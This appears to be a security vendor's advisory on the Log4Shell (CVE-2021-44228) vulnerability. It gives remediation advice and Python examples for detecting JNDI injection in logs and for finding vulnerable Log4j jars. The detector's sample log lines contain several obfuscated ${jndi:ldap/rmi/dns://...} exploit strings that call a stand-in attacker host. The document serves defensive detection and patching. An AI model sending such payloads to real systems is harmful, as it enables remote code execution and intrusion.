The HHS Cybersecurity Program has issued a letter warning of a software vulnerability putting healthcare organizations at risk of a cyberattack.

Following the public disclosure of the Log4j vulnerability, CyberMaxx has been working to detect, prevent, and respond to exploitation of this critical vulnerability.

The vulnerability, tracked as CVE-2021-44228 and referred to as “Log4Shell,” affects Java-based applications that use Log4j 2 versions 2.0-beta9 through 2.14.1, as well as any product that bundles a vulnerable copy of Log4j 2. It is remotely exploitable over the network without authentication: an attacker only needs to get a crafted string containing a JNDI lookup (for example a `${jndi:ldap://...}` reference) into a value that the application logs, such as a User-Agent header or a form field. Successful exploitation gives the attacker remote code execution on the logging host, which can in turn lead to data exfiltration and ransomware.

This vulnerability does not impact CyberMaxx appliances and infrastructure.

In response to this vulnerability, CyberMaxx has implemented the following:

  • Signatures deployed to MAXX SIEM
  • Signatures deployed to MAXX Network
  • Blocking across all sensors of identified Log4j threats and threat actors
  • Utilization of MAXX MDR resources to identify and notify about vulnerable systems
  • Scans initiated in MAXX VRM using the latest plugins
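
The signature work above comes down to recognising a JNDI lookup in logged request data even when the attacker obfuscates it. The following is an added example written for this notice, not CyberMaxx detection content and not code from the Apache project: it normalises the lookup tricks seen in the wild (nested `${lower:...}`/`${upper:...}` lookups, the `${key:-default}` fallback syntax, and percent-encoding) and then matches the recovered `jndi:<scheme>://` reference. The log lines are constructed for the example, and the 198.51.100.7 endpoint is a documentation address, not a real indicator.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in web access logs.

Added example: normalises Log4j lookup obfuscation, then matches the JNDI reference.
"""
import re
import urllib.parse

# Innermost ${...} lookup: a body containing no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# JNDI reference that survives normalisation: jndi:<scheme>:[//]<endpoint>
JNDI_REF = re.compile(
    r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|http):/*([^\s\"'}]*)", re.IGNORECASE
)


def resolve_lookups(text, max_rounds=32):
    """Collapse the lookup constructs attackers use to hide the word 'jndi'.

    Works inside-out, one innermost ${...} per round, the way the vulnerable
    layout would evaluate nested lookups. Unknown lookups are left as bare text
    so that the final 'jndi:...' string is visible to JNDI_REF.
    """
    for _ in range(max_rounds):
        m = INNER_LOOKUP.search(text)
        if m is None:
            break
        body = m.group(1)
        if ":-" in body:
            # ${key:-default}: an undefined key yields its default, so
            # ${::-j} and ${env:NOPE:-j} both become "j".
            repl = body.split(":-", 1)[1]
        elif body.lower().startswith("lower:"):
            repl = body[len("lower:"):].lower()
        elif body.lower().startswith("upper:"):
            repl = body[len("upper:"):].upper()
        else:
            repl = body
        text = text[: m.start()] + repl + text[m.end():]
    return text


def url_decode(text, max_rounds=3):
    """Undo (possibly repeated) percent-encoding used to slip past naive filters."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def detect(line):
    """Return details of a JNDI injection found in the line, or None if it is clean."""
    normalized = resolve_lookups(url_decode(line))
    m = JNDI_REF.search(normalized)
    if m is None:
        return None
    return {
        "scheme": m.group(1).lower(),
        "endpoint": m.group(2).split("/", 1)[0],  # host[:port] the victim would call out to
        "normalized": m.group(0),
    }


def scan(lines):
    """Run detect() over an iterable of log lines; return the hits with 1-based line numbers."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = detect(line)
        if hit:
            hit["line"] = n
            hits.append(hit)
    return hits


# Constructed sample access-log lines (not captured traffic). Lines 2-5 are attacks.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:22:14:03 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:22:14:05 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:22:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:22:14:09 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 200 612 "-" "curl/7.79"',
    '10.0.0.5 - - [10/Dec/2021:22:14:11 +0000] "GET /?q=${env:JAVA_HOME} HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} callback to {hit['endpoint']} ({hit['normalized']})")
```

The `endpoint` field is the most useful output for the blocking step: it is the host the vulnerable server would connect back to, which is what an egress rule or sensor block list needs. Line 6 shows why the detector keys on the recovered `jndi:` reference rather than on `${` alone: ordinary lookups are legitimate Log4j syntax and would otherwise flood the SIEM with false positives.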

CyberMaxx recommends that customers review the Apache and Microsoft security advisories below and apply the appropriate security updates to remediate the vulnerability. All systems, including those that are not customer-facing, are potentially vulnerable: any component that logs attacker-influenced input can be exploited, even if the input reached it through another service. Therefore, we also recommend upgrading backend systems and microservices. At the time of this notice Microsoft recommends updating Log4j 2 to 2.15.0; Apache has since published further releases (2.16.0 and 2.17.x) addressing follow-on issues, so consult the Apache advisory for the currently recommended version. CyberMaxx also recommends limiting outbound connections from servers, in particular LDAP, RMI and DNS to untrusted destinations, to help mitigate this attack: the exploit depends on the vulnerable server fetching its payload from an attacker-controlled endpoint, so blocking that callback breaks the chain even on hosts that have not yet been patched.
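Finding every copy of Log4j 2 is the hard part of the upgrade advice above, because the library is routinely bundled inside application WARs and fat JARs rather than installed on its own. The following scanner is an added example for this notice, not a CyberMaxx or Apache tool: it walks a directory tree, opens each archive, descends into nested archives, reads the log4j-core Maven metadata to get the version, and checks whether `JndiLookup.class` is still present (removing that class was the accepted stop-gap for hosts that could not upgrade immediately). The affected range 2.0-beta9 through 2.14.1 is from Apache's advisory; the small set of backported fix releases for older JREs is listed as an assumption from the same advisory, and `build_sample_jar` fabricates a minimal stand-in archive so the scanner can be exercised without a real Log4j build.

```python
"""Locate Log4j 2 copies on disk and classify them for CVE-2021-44228.

Added example. Version range per Apache's advisory; sample archives are constructed.
"""
import io
import os
import re
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

# Backported fix releases for Java 6/7 that fall inside the numeric range but are
# not vulnerable to CVE-2021-44228 (assumption taken from the Apache advisory).
BACKPORTED_FIXES = {"2.3.1", "2.3.2", "2.12.2", "2.12.3", "2.12.4"}


def parse_version(v):
    """'2.14.1' -> (2, 14, 1, '~'); '2.0-beta9' -> (2, 0, 0, 'beta9').

    The trailing element makes pre-releases sort below the final release of the
    same number ('~' is greater than every letter in ASCII).
    """
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(.+))?$", v)
    if not m:
        raise ValueError(f"unparseable Log4j version {v!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), pre or "~")


AFFECTED_LOW = parse_version("2.0-beta9")
AFFECTED_HIGH = parse_version("2.14.1")


def classify(version, has_jndi_lookup):
    """Classify one log4j-core instance for CVE-2021-44228 only."""
    if version == "unknown":
        return "review-manually"  # shaded jar without Maven metadata
    if version in BACKPORTED_FIXES:
        return "not-affected"
    key = parse_version(version)
    if key < AFFECTED_LOW or key > AFFECTED_HIGH:
        return "not-affected"
    return "vulnerable" if has_jndi_lookup else "mitigated"


def inspect_archive(data, name="<bytes>", depth=0, max_depth=4):
    """Yield (location, version, has_jndi_lookup) for each log4j-core in the archive bytes,
    descending into nested archives such as WEB-INF/lib/*.jar."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    has_jndi = JNDI_LOOKUP in names
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.MULTILINE)
        yield (name, m.group(1).strip() if m else "unknown", has_jndi)
    elif has_jndi:
        # Class is present but Maven metadata is missing (shaded/relocated build).
        yield (name, "unknown", True)
    if depth >= max_depth:
        return
    for member in sorted(names):
        if member.lower().endswith(ARCHIVE_EXT):
            yield from inspect_archive(zf.read(member), f"{name}!/{member}", depth + 1, max_depth)


def scan_tree(root):
    """Scan every archive under root; return a list of findings with a status each."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if not f.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, f)
            with open(path, "rb") as fh:
                data = fh.read()
            for loc, version, has_jndi in inspect_archive(data, path):
                findings.append({"location": loc, "version": version,
                                 "status": classify(version, has_jndi)})
    return findings


def build_sample_jar(version, include_jndi_lookup, wrap_in_war=False):
    """Constructed stand-in for log4j-core-<version>.jar (not a real Log4j build):
    only the two members the scanner inspects, optionally nested inside a WAR."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    inner = buf.getvalue()
    if not wrap_in_war:
        return inner
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr(f"WEB-INF/lib/log4j-core-{version}.jar", inner)
    return outer.getvalue()


if __name__ == "__main__":
    import sys
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{finding['status']:16} {finding['version']:10} {finding['location']}")
```

Run it as `python scan_log4j.py /opt` on each host, including backend and non-customer-facing systems, and treat `review-manually` findings as vulnerable until proven otherwise; shaded jars hide the version but not the class. A `mitigated` result means the class was removed and the host still needs the upgrade.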

References:

https://logging.apache.org/log4j/2.x/security.html

https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/